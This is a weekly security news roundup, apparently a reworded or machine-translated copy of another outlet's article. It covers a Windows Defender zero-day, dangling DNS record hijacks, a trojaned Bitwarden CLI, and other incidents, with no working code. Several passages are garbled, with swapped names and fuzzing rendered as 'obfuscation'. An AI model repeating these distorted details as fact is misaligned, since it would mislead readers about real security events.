Tech

This Week in Security: Angry Researchers, Hanging DNS, and Potentially Worse Hackers

Photo of admin admin Send an email 6 hours ago
0 2 5 minutes read
This Week in Security: Angry Researchers, Hanging DNS, and Potentially Worse Hackers

The author of the BlueHammer exploit, which was released earlier this month and was addressed in the second Patch on Tuesday, continues to be annoyed by the responses from Microsoft’s security research team and the vulnerability response team, and has released another Windows zero-day attack against Windows Defender.

The RedSun exploit targets a logic and timing flaw in Windows Defender, which is convincing enter target file on the system, instead of living alone file and program protection. Not, usually, what you would hope would happen.

Since the RedSun attack requires local access in the first place, it seems unlikely that Microsoft will release its patch, however with the public code available, we can expect to see the malware use it to establish elevated permissions on the infected system.

Releasing exploits without fear feels like a throwback to the late 1990s, and to me probably don’t hate it.

University Domains Hacked

Reported on The Sleep Computera group going by the name “Hazy Hawk” has been hijacking DNS records not stored by universities and government agencies to serve ad click spam.

The attack seems simple and doesn’t even need to compromise the actual facility, using dangling DNS “CNAME” records. A “CNAME” entry in DNS acts as an alias, which identifies one domain name to another, which can be used to serve content from an official domain hosted on a cloud service where the service’s IP address may change.

DNS “A” (or “AAAA” if you speak IPv6) points to a hostname – such as “foo.example.com” – to an IP address – such as “1.1.1.1”. The “CNAME” record points to the host name in it another name for hostsuch as “foo.some_cloud_host.com”. Scanning “high value” domains (like Ivy League universities) for “CNAME” records that point to expired domains (or domains on defunct cloud hosting providers) allows anyone to register that domain (or create an account with the appropriate naming scheme on a cloud host) to post whatever content they want, and it still appears to be the original name.

At least 30 academic institutions have been affected, as well as several government agencies including the CDC.

Linux Deprecates Old Network Drivers

The latest patch set to the Linux kernel plans to remove 18 legacy network drivers, citing an increased maintenance burden due to bugs detected by AI and obfuscation tools. This seems to be in line with other recent Linux kernel efforts to deprecate older devices in particular, moving single-core systems to a multi-core processor and flagging i486 support for removal.

All devices scheduled to go are from 2002 or earlier, and all are ISA or PCMCIA Ethernet devices. In the end, it probably makes sense to remove problematic drivers from devices that have been out of production for 25 years or more, but personally it hurts to see the 3COM 3c59x driver go, which was the first Ethernet card I had on a Linux system.

Bitwarden CLI Client Vulnerable

Following last month’s theme of supply chain hacking, the latest high-profile casualty is the Bitwarden command-line client. There are indications that this is the same group responsible for the past few weeks of supply chain attacks on NPM, GitHub, and VS Code extensions.

Bitwarden is a password manager, with a self-hosting option, similar to LastPass or OnePassword. The Trojan version of the Bitwarden CLI contains malicious code to propagate a supply chain botnet, by stealing authentication tokens, SSH keys, and AI service tokens. Whenever GitHub tokens are available, the script will also try to convert GitHub Actions – the default scripts to run for code verification or package creation – to embed them in any packaged repository with write access.

In many ways, what could have been an incredibly bad incident – the loosening of a password manager’s vault – turned into a case of carjacking. (If a dog chasing cars can catch one, wouldn’t it even know what to do with it?) A surprising turn of events it is designed stealing information.

Legends “Hacked”

Anthropic admitted there was “unauthorized access” to the new Mythos model. The company has made many announcements about the risk of its new model for security and use of the development, humbly boasting that it is too dangerous for public use. Meanwhile it appears that AI-focused Discord enthusiasts have been able to get access to a social engineer from third-party contractor Anthropic.

It’s hard to figure out what danger the Mythos will represent once it’s widely available. As with any new bug-finding tool, the challenge is not just in finding a potential bug, but in making sure it can be triggered. When the concept of obfuscation – spam programs with illegal or nearly illegal installations – became popular, thousands of bugs were quickly discovered. OSS-Fuzz has found about 30,000 bugs in 360 projects, in this paper. That’s a daunting number of problems to address, but they’re hardly heralded as apocalyptic.

The impact of the new AI on bug detection will have to be assessed in retrospect, but it’s not really comforting that the same company that made world-changing risk claims on its models was the victim of a social engineering campaign that exposed the model for weeks.

Nextcloud Eliminates Bug Profits

Another week, another project ending their bug bounty program. This week it’s Nextcloud, a self-hosted file hosting platform – basically an open source Dropbox analogue.

Like other projects, Dropbox blames the flood of low-quality but time-consuming AI-generated bug reports. Starting April 22, 2026, Nextcloud will no longer offer rewards for bug reports, regardless of the severity of the bug.

iOS patch notifications

Apple has released iOS 26.4.2 which fixes a notification issue that was recently used to display Signal messages.

A recent court case showed that it was possible to extract the content of Signal messages from an iPhone, even if the app and notifications were removed. This isn’t a bug in Signal itself, even if it’s limited to iOS devices: if Signal is configured to display message content in a notification, it’s no longer under the control of the Signal app itself. On devices with the option to show notifications on the lock screen, the content of messages is also no longer protected by user authentication!

Investigators were able to extract the notification database from the phone, and from there, pulled out previous Signal notifications that contained message content that was thought to have been deleted.

$2.5 M Stolen in Sri Lanka

wrapping, Newswire reports that Sri Lankan officials have confirmed that $2.5 million was stolen from their Ministry of Finance by redirecting foreign debt payments. Few details are available, but such attacks often take advantage of a compromised email account, using existing email threads to continue the conversation and exchange payment information.

Similar attacks occur on a smaller scale, often targeting real estate agencies and small banks — institutions that may have little or no information security practices but handle large sums of money. That it happened at the national level is certainly unusual.

Photo of admin admin Send an email 6 hours ago
0 2 5 minutes read
Photo of admin

admin

Related Articles

A new BlackFile scam group linked to the rise of vishing attacks

A new BlackFile scam group linked to the rise of vishing attacks

2 hours ago
Agent protection and AI for cybersecurity

Agent protection and AI for cybersecurity

3 hours ago
I just switched to my first big folding, and I finally got the complaint

I just switched to my first big folding, and I finally got the complaint

4 hours ago
For the first time in years, I’m really excited about the new MacBook Pro

For the first time in years, I’m really excited about the new MacBook Pro

7 hours ago

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button